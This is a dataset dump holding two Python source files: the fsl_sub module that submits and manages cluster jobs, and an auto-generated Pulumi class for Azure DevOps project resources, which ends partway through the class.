text stringlengths 957 885k |
|---|
<filename>fsl_sub/__init__.py
#!/usr/bin/env fslpython
# fsl_sub python module
# Copyright (c) 2018-2021, University of Oxford (<NAME>)
import datetime
import errno
import getpass
import logging
import os
import socket
import shlex
import warnings
from math import ceil
from fsl_sub.exceptions import (
BadConfiguration,
BadSubmission,
CommandError,
UnrecognisedModule,
)
from fsl_sub.coprocessors import (
max_coprocessors,
coproc_get_module,
)
from fsl_sub.config import (
read_config,
method_config,
coprocessor_config,
uses_projects,
)
import fsl_sub.consts
from fsl_sub.projects import (
get_project_env,
project_exists,
)
from fsl_sub.utils import (
load_plugins,
build_job_name,
check_command,
check_command_file,
get_plugin_qdel,
control_threads,
human_to_ram,
update_envvar_list,
)
from fsl_sub.version import VERSION
def fsl_sub_warnings_formatter(
message, category, filename, lineno, file=None, line=None):
return str(message) + '\n'
warnings.formatwarning = fsl_sub_warnings_formatter
warnings.simplefilter('always', UserWarning)
def version():
return VERSION
def report(
job_id,
subjob_id=None
):
'''Request a job status. Returns a dictionary:
id
name
script (if available)
arguments (if available)
submission_time
tasks (dict keyed on sub-task ID):
status:
fsl_sub.consts.QUEUED
fsl_sub.consts.RUNNING
fsl_sub.consts.FINISHED
fsl_sub.consts.FAILEDNQUEUED
fsl_sub.consts.SUSPENDED
fsl_sub.consts.HELD
start_time
end_time
sub_time
utime
stime
exit_status
error_message
maxmemory (in Mbytes)
parents (if available)
children (if available)
job_directory (if available)
'''
PLUGINS = load_plugins()
config = read_config()
if config['method'] == 'shell':
ntime = datetime.datetime.now()
return {
'id': 123456,
'name': 'nojob',
'script': None,
'arguments': None,
'submission_time': ntime,
'tasks': {
'1': {
'status': fsl_sub.consts.FINISHED,
'start_time': ntime,
'end_time': ntime,
'sub_time': ntime,
'utime': 0,
'stime': 0,
'exit_status': 0,
'error_message': None,
'maxmemory': 0
}
},
'parents': None,
'children': None,
'job_directory': None,
'fake': True
}
grid_module = 'fsl_sub_plugin_' + config['method']
if grid_module not in PLUGINS:
raise BadConfiguration(
"{} not a supported method".format(config['method']))
try:
job_status = PLUGINS[grid_module].job_status
except AttributeError as e:
raise BadConfiguration(
"Failed to load plugin " + grid_module
+ " ({0})".format(str(e))
)
return job_status(job_id, subjob_id)
def submit(
command,
name=None,
threads=1,
queue=None,
jobhold=None,
array_task=False,
array_hold=None,
array_limit=None,
array_specifier=None,
parallel_env=None,
jobram=None,
jobtime=None,
resources=None,
ramsplit=True,
priority=None,
validate_command=True,
mail_on=None,
mailto="{username}@{hostname}".format(
username=getpass.getuser(),
hostname=socket.gethostname()),
logdir=None,
coprocessor=None,
coprocessor_toolkit=None,
coprocessor_class=None,
coprocessor_class_strict=False,
coprocessor_multi="1",
usescript=False,
architecture=None,
requeueable=True,
as_tuple=False,
project=None,
export_vars=None,
keep_jobscript=False
):
'''Submit job(s) to a queue, returns the job id as an int (pass as_tuple=True
to return a single value tuple).
Single tasks require a command in the form of a list [command, arg1,
arg2, ...] or simple string "command arg1 arg2".
Array tasks (array_task=True) require a file name of the array task table
file unless array_specifier(=n[-m[:s]]) is specified in which case command
is as per a single task.
Requires:
command - string or list containing command to run
or the file name of the array task file.
If array_specifier is given then this must be
a string/list containing the command to run.
Optional:
name - Symbolic name for task (defaults to first component of command)
array_task - is the command is an array task (defaults to False)
jobhold - id(s) of jobs to hold for (string or list)
array_hold - complex hold string, integer or list
array_limit - limit concurrently scheduled array
tasks to specified number
array_specifier - n[-m[:s]] n subtasks or starts at n, ends at m with
a step of s.
as_tuple - if true then return job ID as a single value tuple
parallel_env - parallel environment name
jobram - RAM required by job (total of all threads)
jobtime - time (in minutes for task)
requeueable - job may be requeued on node failure
resources - list of resource request strings
ramsplit - break tasks into multiple slots to meet RAM constraints
priority - job priority (0-1023)
mail_on - mail user on 'a'bort or reschedule, 'b'egin, 'e'nd,
's'uspended, 'n'o mail
mailto - email address to receive job info
logdir - directory to put log files in
coprocessor - name of coprocessor required
coprocessor_toolkit - coprocessor toolkit version
coprocessor_class - class of coprocessor required
coprocessor_class_strict - whether to choose only this class
or all more capable
coprocessor_multi - how many coprocessors you need (or
complex description) (int or string)
queue - Explicit queue to submit to - use jobram/jobtime in preference to
this
usescript - queue config is defined in script
project - Cluster project to submit job to, defaults to None
export_vars - list of environment variables to preserve for job
ignored if job is copying complete environment
keep_jobscript - whether to generate and keep a script defining the parameters
used to run your task
validate_command - whether to validate the command or not.
'''
logger = logging.getLogger(__name__)
try:
debugging = os.environ['FSLSUB_DEBUG'] == '1'
except KeyError:
debugging = False
if debugging:
update_envvar_list(export_vars, 'FSLSUB_DEBUG=1')
logger.setLevel(logging.DEBUG)
# Can't just have export_vars=[] in function definition as the list is mutable so subsequent calls
# will return the updated list!
if export_vars is None:
export_vars = []
my_export_vars = list(export_vars)
# Ensure FSLSUB's configuration file path is propagated to jobs
if 'FSLSUB_CONF' in os.environ.keys():
update_envvar_list(my_export_vars, '='.join(('FSLSUB_CONF', os.environ['FSLSUB_CONF'])))
logger.debug("Submit called with:")
logger.debug(
" ".join(
[
str(a) for a in [
command, name, threads, queue, jobhold, array_task,
array_hold, array_limit, array_specifier, parallel_env,
jobram, jobtime, resources, ramsplit, priority,
validate_command, mail_on, mailto, logdir,
coprocessor, coprocessor_toolkit, coprocessor_class,
coprocessor_class_strict, coprocessor_multi,
usescript, architecture, requeueable,
as_tuple, project,
]
]
)
)
PLUGINS = load_plugins()
config = read_config()
grid_module = 'fsl_sub_plugin_' + config['method']
if grid_module not in PLUGINS:
raise BadConfiguration(
"{} not a supported method".format(config['method']))
try:
already_queued = PLUGINS[grid_module].already_queued
qtest = PLUGINS[grid_module].qtest
except AttributeError as e:
raise BadConfiguration(
"Failed to load plugin " + grid_module
+ " ({0})".format(str(e))
)
if config['method'] != 'shell':
if already_queued():
config['method'] = 'shell'
warnings.warn(
'Warning: job on queue attempted to submit more jobs -'
'running jobs using shell plugin instead.'
)
config['qtest'] = qtest()
if config['qtest'] is None:
config['method'] = 'shell'
warnings.warn(
'Warning: fsl_sub configured for {0} but {0}'
' software not found.'.format(config['method'])
)
logger.debug("Configuring plugin " + config['method'])
# Reset grid_module in case we've switched to the Shell plugin
grid_module = 'fsl_sub_plugin_' + config['method']
try:
queue_submit = PLUGINS[grid_module].submit
qtest = PLUGINS[grid_module].qtest
queue_exists = PLUGINS[grid_module].queue_exists
BadSubmission = PLUGINS[grid_module].BadSubmission
already_queued = PLUGINS[grid_module].already_queued
except AttributeError as e:
raise BadConfiguration(
"Failed to load plugin " + grid_module
+ " ({0})".format(str(e))
)
if isinstance(command, str) or len(command) == 1:
# command is a basic string or single element list
logger.debug("Simple string or single element list passed")
if isinstance(command, list):
command = command[0]
if ';' not in command:
logger.debug("String being shlex split")
command = shlex.split(command)
else:
# Command is a shell one-liner, we can't reliably split this
logger.debug("String contains ';' we cannot split it")
command = [command]
logger.debug("Disabling validation")
validate_command = False
logger.debug(command)
elif not isinstance(command, list):
raise BadSubmission("Command should be a list or string")
logger.debug("Loading configuration for " + config['method'])
mconfig = method_config(config['method'])
logger.debug("Method configuration is " + str(mconfig))
logger.debug(
"Adding export_vars from config to provided list "
+ str(my_export_vars) + str(config.get('export_vars', [])))
[update_envvar_list(my_export_vars, a, overwrite=False) for a in config.get('export_vars', [],)]
parallel_env_requested = parallel_env
if logdir is not None and logdir != "/dev/null":
try:
os.makedirs(logdir)
except OSError as e:
if e.errno != errno.EEXIST:
raise BadSubmission(
"Unable to create {0} ({1})".format(
logdir, str(e)
))
else:
if not os.path.isdir(logdir):
raise BadSubmission(
"Log destination is a file "
"(should be a folder)")
if jobram is None:
try:
mem_requested = human_to_ram(
os.environ['FSLSUB_MEMORY_REQUIRED'],
fsl_sub.consts.RAMUNITS,
as_int=True)
except KeyError:
pass
except ValueError:
logger.warn("FSLSUB_MEMORY_REQUIRED variable doesn't make sense")
else:
jobram = mem_requested
if mconfig['mail_support'] is True:
if mail_on is None:
try:
mail_on = mconfig['mail_mode']
except KeyError:
warnings.warn(
"Mail not configured but enabled in configuration for "
+ config['method'])
else:
# Mail modes is a dictionary
if mail_on not in mconfig['mail_modes']:
raise BadSubmission(
"Unrecognised mail mode " + mail_on)
# For simple numbers pass these in as list, if they are strings
# then leave them alone
if jobhold is not None:
if not isinstance(jobhold, (str, int, list, tuple)):
raise BadSubmission(
"jobhold must be a string, int, list or tuple")
if array_hold is not None:
if not isinstance(array_hold, (str, int, list, tuple)):
raise BadSubmission(
"array_hold must be a string, int, list or tuple")
validate_type = 'command'
if array_task is False:
job_type = 'single'
if (
array_hold is not None
or array_limit is not None
or array_specifier is not None):
raise BadSubmission(
"Array controls not applicable to non-array tasks")
elif array_specifier is None:
job_type = 'array file'
validate_type = 'array'
else:
job_type = 'array aware command'
validate_type = 'command'
logger.info(
"METHOD={0} : TYPE={1} : args={2}".format(
config['method'],
job_type,
" ".join(command)
))
if validate_command:
if validate_type == 'array':
try:
check_command_file(command[0])
except CommandError as e:
raise BadSubmission(
"Array task definition file fault: " + str(e)
)
elif validate_type == 'command':
if usescript is False:
try:
check_command(command[0])
except CommandError as e:
raise BadSubmission(
"Command not usable: " + str(e)
)
else:
if not os.path.exists(command[0]):
raise BadSubmission(
"Script file not found"
)
else:
raise BadConfiguration(
"Unknown validation type: " + validate_type)
if name is None:
task_name = build_job_name(command)
logger.debug("No name passed - setting to " + task_name)
else:
task_name = name
if mconfig['queues'] is False:
queue = None
split_on_ram = None
else:
split_on_ram = mconfig.get('map_ram', True) and ramsplit
if (split_on_ram
and parallel_env is None
and 'large_job_split_pe' in mconfig):
parallel_env = mconfig['large_job_split_pe']
if queue is None:
queue_details = getq_and_slots(
job_time=jobtime,
job_ram=jobram,
job_threads=threads,
queues=config['queues'],
coprocessor=coprocessor,
ll_env=parallel_env
)
logger.debug("Automatic queue selection:")
logger.debug(queue_details)
(queue, slots_required) = queue_details
else:
if not queue_exists(queue):
raise BadSubmission("Unrecognised queue " + queue)
logger.debug("Specific queue: " + queue)
slots_required = _slots_required(queue, jobram, config['queues'], threads)
threads = max(slots_required, threads)
control_threads(config['thread_control'], threads, add_to_list=my_export_vars)
if threads == 1 and parallel_env_requested is None:
parallel_env = None
if threads > 1 and parallel_env is None:
raise BadSubmission(
"Job requires {} slots but no parallel envrionment "
"available or requested".format(threads))
if threads > 1 and mconfig.get('thread_ram_divide', False) and not split_on_ram:
split_on_ram = True
if coprocessor:
if mconfig['queues']:
# If coprocessor resource is in Scheduling multiple GPUS...
# PE as first port of call, do we need a separate way of specifying gpu qty
if isinstance(coprocessor_multi, int):
coprocessor_multi = str(coprocessor_multi)
if coprocessor_multi != '1':
try:
if int(coprocessor_multi) > max_coprocessors(coprocessor):
raise BadSubmission(
"Unable to provide {} coprocessors for job".format(
coprocessor_multi
))
except ValueError:
# Complex coprocessor_multi passed - do not validate
pass
usepe = coprocessor_config(coprocessor).get('uses_pe', False)
if usepe:
try:
if usepe not in config['queues'][queue]['parallel_envs']:
raise KeyError()
except KeyError:
raise BadSubmission(
"uses_pe set but selected queue {0} does not have PE {1} configured".format(
queue, usepe
))
parallel_env = usepe
try:
gpus_req = int(coprocessor_multi)
except ValueError:
raise BadSubmission(
"Specified coprocessor_multi argument is a complex value but cluster "
"configured with 'uses_pe' which requires a simple integer"
)
if gpus_req > threads:
if gpus_req > config['queues'][queue]['max_slots']:
raise BadSubmission("More GPUs than queue slots have been requested")
threads = gpus_req
control_threads(config['thread_control'], threads, add_to_list=my_export_vars)
if coprocessor_toolkit:
logger.debug("Looking for coprocessor toolkit")
logger.debug(":".join((coprocessor, coprocessor_toolkit)))
try:
coproc_get_module(coprocessor, coprocessor_toolkit)
except UnrecognisedModule as e:
raise BadSubmission(
"Unable to load coprocessor toolkit " + str(e)
)
if uses_projects():
q_project = get_project_env(project)
if q_project is not None and not project_exists(q_project):
raise BadSubmission(
"Project not recognised"
)
else:
q_project = None
logger.debug("Calling queue_submit fsl_sub_plugin_{0} with: ".format(config['method']))
logger.debug(
", ".join(
[str(a) for a in [
command, task_name, queue, jobhold, array_task,
array_hold, array_limit, array_specifier, parallel_env,
jobram, jobtime, resources, ramsplit, priority,
mail_on, mailto, logdir, coprocessor, coprocessor_toolkit,
coprocessor_class, coprocessor_class_strict, coprocessor_multi,
usescript, architecture, requeueable]]))
job_id = queue_submit(
command,
job_name=task_name,
threads=threads,
queue=queue,
jobhold=jobhold,
array_task=array_task,
array_hold=array_hold,
array_limit=array_limit,
array_specifier=array_specifier,
parallel_env=parallel_env,
jobram=jobram,
jobtime=jobtime,
resources=resources,
ramsplit=split_on_ram,
priority=priority,
mail_on=mail_on,
mailto=mailto,
logdir=logdir,
coprocessor=coprocessor,
coprocessor_toolkit=coprocessor_toolkit,
coprocessor_class=coprocessor_class,
coprocessor_class_strict=coprocessor_class_strict,
coprocessor_multi=coprocessor_multi,
usescript=usescript,
architecture=architecture,
requeueable=requeueable,
project=q_project,
export_vars=my_export_vars,
keep_jobscript=keep_jobscript
)
if as_tuple:
return (job_id,)
else:
return job_id
def _slots_required(q_name, jobram, qconfig, threads):
logger = logging.getLogger(__name__)
if '@' in q_name:
logger.debug("q@host requested, removing @host from all queues")
q_name = ','.join([q.split('@')[0] for q in q_name.split(',')])
if q_name in qconfig:
return calc_slots(
jobram,
qconfig[q_name]['slot_size'],
threads)
else:
logger.debug("queue definition not found, defaulting to single slot")
return 1
def calc_slots(job_ram, slot_size, job_threads):
'''Calculate how many slots would be necessary to
provide this job request'''
logger = logging.getLogger(__name__)
logger.debug(
"Calc slots based on JR:SS:JT - {0}:{1}:{2}".format(
job_ram, slot_size, job_threads
))
if job_ram == 0 or job_ram is None:
return max(1, job_threads)
else:
if slot_size is not None:
return max(int(ceil(job_ram / slot_size)), job_threads)
return job_threads
def getq_and_slots(
queues, job_time=0, job_ram=0,
job_threads=1, coprocessor=None,
ll_env=None):
'''Calculate which queue to run the job on. job_time is in minutes, job_ram in units given in configuration.
Still needs job splitting across slots'''
logger = logging.getLogger(__name__)
if job_ram is None:
job_ram = 0
queue_list = list(queues.keys())
if not queue_list:
raise BadSubmission("No queues found")
# Filter on coprocessor availability
if coprocessor is not None:
queue_list = [
q for q in queue_list if 'copros' in queues[q]
and coprocessor in queues[q]['copros']]
if not queue_list:
raise BadSubmission("No queues with requested co-processor found")
else:
tq = []
for q in queue_list:
qd = queues[q]
if 'copros' not in qd:
tq.append(q)
else:
qdcp = qd['copros']
if not all([qdcp[c].get('exclusive', True) for c in qdcp]):
tq.append(q)
queue_list = tq
if not queue_list:
raise BadSubmission("No queues found without co-processors defined that are non-exclusive")
# Filter on parallel environment availability
if ll_env is not None:
queue_list = [
q for q in queue_list if 'parallel_envs' in queues[q]
and ll_env in queues[q]['parallel_envs']
]
if not queue_list:
raise BadSubmission("No queues with requested parallel environment found")
# If no job time was specified then find the default queues
# (if defined)
if job_time is None or job_time == 0:
d_queues = [
q for q in queue_list if 'default' in queues[q]
]
if d_queues:
queue_list = d_queues
job_time = 0
slots = {}
for index, q in enumerate(queue_list):
slots[q] = calc_slots(
job_ram, queues[q]['slot_size'], job_threads)
# If group/priority not specified then create pseudo-groups, one for each queue
if 'group' not in queues[q].keys():
queues[q]['group'] = index
if 'priority' not in queues[q].keys():
queues[q]['priority'] = 1
queue_list.sort(key=lambda x: queues[x]['priority'], reverse=True)
queue_list.sort(key=lambda x: (queues[x]['group'], slots[x]))
ql = [
q for q in queue_list if queues[q]['time'] >= job_time
and queues[q]['max_size'] >= job_ram
and queues[q]['max_slots'] >= job_threads]
if not ql:
raise BadSubmission("No queues matching time/RAM/thread requirements found")
logger.info(
"Estimated RAM was {0} GBm, runtime was {1} minutes.\n".format(
job_ram, job_time
))
if coprocessor:
logger.info("Co-processor {} was requested".format(coprocessor))
if len(ql):
logger.info(
"Appropriate queue is {}".format(ql[0]))
try:
q_tuple = (ql[0], slots[ql[0]])
except IndexError:
raise BadSubmission("No matching queues found")
return q_tuple
def delete_job(job_id):
'''Function that attemps to kill a job (either cluster or shell)'''
PLUGINS = load_plugins()
config = read_config()
grid_module = 'fsl_sub_plugin_' + config['method']
if grid_module not in PLUGINS:
raise BadConfiguration(
"{} not a supported method".format(config['method']))
try:
already_queued = PLUGINS[grid_module].already_queued
except AttributeError as e:
raise BadConfiguration(
"Failed to load plugin " + grid_module
+ " ({0})".format(str(e))
)
if already_queued():
config['method'] = 'shell'
return get_plugin_qdel(config['method'])(job_id)
|
<gh_stars>10-100
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ProjectArgs', 'Project']
@pulumi.input_type
class ProjectArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
version_control: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None,
work_item_template: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Project resource.
:param pulumi.Input[str] description: The Description of the Project.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] features: Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
:param pulumi.Input[str] name: The Project Name.
:param pulumi.Input[str] version_control: Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
:param pulumi.Input[str] visibility: Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
:param pulumi.Input[str] work_item_template: Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if features is not None:
pulumi.set(__self__, "features", features)
if name is not None:
pulumi.set(__self__, "name", name)
if version_control is not None:
pulumi.set(__self__, "version_control", version_control)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
if work_item_template is not None:
pulumi.set(__self__, "work_item_template", work_item_template)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The Description of the Project.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def features(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
"""
return pulumi.get(self, "features")
@features.setter
def features(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "features", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The Project Name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="versionControl")
def version_control(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
"""
return pulumi.get(self, "version_control")
@version_control.setter
def version_control(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version_control", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "visibility", value)
@property
@pulumi.getter(name="workItemTemplate")
def work_item_template(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
return pulumi.get(self, "work_item_template")
@work_item_template.setter
def work_item_template(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "work_item_template", value)
@pulumi.input_type
class _ProjectState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
process_template_id: Optional[pulumi.Input[str]] = None,
version_control: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None,
work_item_template: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Project resources.
:param pulumi.Input[str] description: The Description of the Project.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] features: Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
:param pulumi.Input[str] name: The Project Name.
:param pulumi.Input[str] process_template_id: The Process Template ID used by the Project.
:param pulumi.Input[str] version_control: Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
:param pulumi.Input[str] visibility: Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
:param pulumi.Input[str] work_item_template: Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if features is not None:
pulumi.set(__self__, "features", features)
if name is not None:
pulumi.set(__self__, "name", name)
if process_template_id is not None:
pulumi.set(__self__, "process_template_id", process_template_id)
if version_control is not None:
pulumi.set(__self__, "version_control", version_control)
if visibility is not None:
pulumi.set(__self__, "visibility", visibility)
if work_item_template is not None:
pulumi.set(__self__, "work_item_template", work_item_template)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The Description of the Project.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def features(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
"""
return pulumi.get(self, "features")
@features.setter
def features(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "features", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The Project Name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="processTemplateId")
def process_template_id(self) -> Optional[pulumi.Input[str]]:
"""
The Process Template ID used by the Project.
"""
return pulumi.get(self, "process_template_id")
@process_template_id.setter
def process_template_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "process_template_id", value)
@property
@pulumi.getter(name="versionControl")
def version_control(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
"""
return pulumi.get(self, "version_control")
@version_control.setter
def version_control(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version_control", value)
@property
@pulumi.getter
def visibility(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
"""
return pulumi.get(self, "visibility")
@visibility.setter
def visibility(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "visibility", value)
@property
@pulumi.getter(name="workItemTemplate")
def work_item_template(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
return pulumi.get(self, "work_item_template")
@work_item_template.setter
def work_item_template(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "work_item_template", value)
class Project(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
version_control: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None,
work_item_template: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a project within Azure DevOps.
## Example Usage
```python
import pulumi
import pulumi_azuredevops as azuredevops
project = azuredevops.Project("project",
description="Test Project Description",
features={
"artifacts": "disabled",
"testplans": "disabled",
},
version_control="Git",
visibility="private",
work_item_template="Agile")
```
## Relevant Links
- [Azure DevOps Service REST API 5.1 - Projects](https://docs.microsoft.com/en-us/rest/api/azure/devops/core/projects?view=azure-devops-rest-5.1)
## PAT Permissions Required
- **Project & Team**: Read, Write, & Manage
## Import
Azure DevOps Projects can be imported using the project name or by the project Guid, e.g.
```sh
$ pulumi import azuredevops:index/project:Project project "Test Project"
```
or
```sh
$ pulumi import azuredevops:index/project:Project project 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The Description of the Project.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] features: Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
:param pulumi.Input[str] name: The Project Name.
:param pulumi.Input[str] version_control: Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
:param pulumi.Input[str] visibility: Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
:param pulumi.Input[str] work_item_template: Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[ProjectArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a project within Azure DevOps.
## Example Usage
```python
import pulumi
import pulumi_azuredevops as azuredevops
project = azuredevops.Project("project",
description="Test Project Description",
features={
"artifacts": "disabled",
"testplans": "disabled",
},
version_control="Git",
visibility="private",
work_item_template="Agile")
```
## Relevant Links
- [Azure DevOps Service REST API 5.1 - Projects](https://docs.microsoft.com/en-us/rest/api/azure/devops/core/projects?view=azure-devops-rest-5.1)
## PAT Permissions Required
- **Project & Team**: Read, Write, & Manage
## Import
Azure DevOps Projects can be imported using the project name or by the project Guid, e.g.
```sh
$ pulumi import azuredevops:index/project:Project project "Test Project"
```
or
```sh
$ pulumi import azuredevops:index/project:Project project 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param ProjectArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProjectArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
version_control: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None,
work_item_template: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProjectArgs.__new__(ProjectArgs)
__props__.__dict__["description"] = description
__props__.__dict__["features"] = features
__props__.__dict__["name"] = name
__props__.__dict__["version_control"] = version_control
__props__.__dict__["visibility"] = visibility
__props__.__dict__["work_item_template"] = work_item_template
__props__.__dict__["process_template_id"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azuredevops:Core/project:Project")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Project, __self__).__init__(
'azuredevops:index/project:Project',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
process_template_id: Optional[pulumi.Input[str]] = None,
version_control: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None,
work_item_template: Optional[pulumi.Input[str]] = None) -> 'Project':
"""
Get an existing Project resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The Description of the Project.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] features: Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
:param pulumi.Input[str] name: The Project Name.
:param pulumi.Input[str] process_template_id: The Process Template ID used by the Project.
:param pulumi.Input[str] version_control: Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
:param pulumi.Input[str] visibility: Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
:param pulumi.Input[str] work_item_template: Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProjectState.__new__(_ProjectState)
__props__.__dict__["description"] = description
__props__.__dict__["features"] = features
__props__.__dict__["name"] = name
__props__.__dict__["process_template_id"] = process_template_id
__props__.__dict__["version_control"] = version_control
__props__.__dict__["visibility"] = visibility
__props__.__dict__["work_item_template"] = work_item_template
return Project(resource_name, opts=opts, __props__=__props__)
@property
